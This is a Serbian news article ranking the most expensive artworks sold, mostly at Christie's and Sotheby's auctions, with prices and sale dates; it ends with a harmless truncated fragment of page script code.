PRESTIŽ ILI INVESTICIJA: Koja umetnička dela vrede stotine miliona dolara
Astronomska vrednost umetničkih dela ne pokazuje samo snagu umetnosti već govori i o prestižu i klasičnoj moć njihovih vlasnika i smatra se dobrom inevsticijom
Kada je sredinom ovog meseca u potkrovlju kuće u u blizini francuskog grada Tuluza otkrivena slika za koju se ispostavilo da je autentičan rad velikana italijanskog baroknog slikarstva Mikelanđela Karavađa i da vredi do 120 miliona evra pomisli ste da je šteta što u i vi na tavanu nemate nešto slično.
Astronomska vrednost umetničkih dela ne pokazuje samo snagu umetnosti već govori i o prestižu i klasnoj moć njihovih vlasnika i smatra se dobrom investicijom. Kupoprodaja ovih unikatnih predmeta odvija se mahom na aukcijama poznatih kuća, a cene se kreću u stotinama miliona dolara.
Zanimljiva je lista najskupljih umetničkih dela koja zaista vrede čitavo bogatstvo.
Delo francuskog slikara Pola Gogena nazvano "Nafea Faa Ipoipo" (Kada ćeš se venčati?) njskuplja je prodata slika i njena cena je 300 miliona dolara.
Sezanova slika "Igrači karata", prodata za 259 miliona dolara 2011. godine.
Na listi najskupljih je Pikasova slika "Žene Alžira" prodata na aukciji američke kuće Kristi u Njujorku, 11. maja 2015, za 179 miliona.
Triptih Frensisa Bejkona "Tri studije Lusijana Frojda" prodat je za 142,4 miliona dolara novembra 2013. godine na aukciji iste kuće.
Skupltura, čiji je autor švajcarski savremeni umetnik Alberto Đakometi, "Čovek koji pokazuje prstom" koštala je 141,285 miliona dolara na aukciji kuće Kristi, takođe 11. maja u Njujorku.
Zadivljujuće delo Džeksona Poloka "Number 5" još jedna je od najskupljih slika ikada prodatih, a naslikao ju je 1948. godine. Cena iznosi 140 miliona američkih dolara.
Slika Vilijama De Kuninga, nazvana "Woman III", završena 1953. godine dokaz je da je i apstraktni ekspresionizam traženiji umetnički pravac jer cena slike iznosi 137.5 miliona američkih dolara. Ovo delo je izabrano kao jedno od 50 remek dela istorije slikarstva.
Delo Gustav Klimta, "Adele Blokh-Bauer I", završeno je 1907. godine, a današnja vrednost iznosi 135 miliona američkih dolara. Kupovinom ove "sitnice" Ronald Lauder priredio je šok u svetu umetnosti. Ne samo zbog cene, već i zbog načina na koji je kupio ovo delo, daleko od bučnih aukcijskih kuća. Slike ove kolekcije su oduzete od Ferdinanda Blok-Bauera za vreme II svetskog rata i postavljene su u nacionalnoj galeriji u Austriji.
Slika norveškog ekspresioniste Edvarda Munka "Vrisak" prodata za 119,9 miliona dolara 2. maja 2012. na aukciji kuće Sotbi u Njuorku. Početna cena bila je 40 miliona dolara.
Delo Pabla Pikasa, "Akt, zeleno lišće i bista", prodato 4. maja 2010. za 106,48 miliona dolara na aukciji kuće Kristi u Njujorku.
Delo Endi Vorhola, metalni diptih dimenzija 2,43 puta 4,0 metra nastalo 1963. Prodato je 13. novembra 2013. u Njujorku kod Sotbija za 105,44 miliona dolara.
Pikasova slika "Dečak sa lulom" prodata 5. maja 2004. na Sotbijevoj aukciji u Njujorku za 104,16 miliona dolara.
Skulptura Đakometija "Čovek koji hoda" prodata za 103,93 miliona dolara na Sotbijevoj aukciji 3. februara 2010, ovoga puta u Londonu.
Đakometijeva skulptura, "Kočija", poznato delo moderne umetnosti koje je na aukciji u Sotbiju 4. novembra 2014. prodato za 100,97 miliona dolara, predstavlja vitku boginju koja stoji na tenku s velikim točkovima kao simbol obnove posleratnog perioda.
Pikasova "Dora Mar sa mačkom" prodata u Njujorku na aukciji Sotbi 3. maja 2006. za 95,1 milion dolara.
var d=document;var s=d.createElement('script');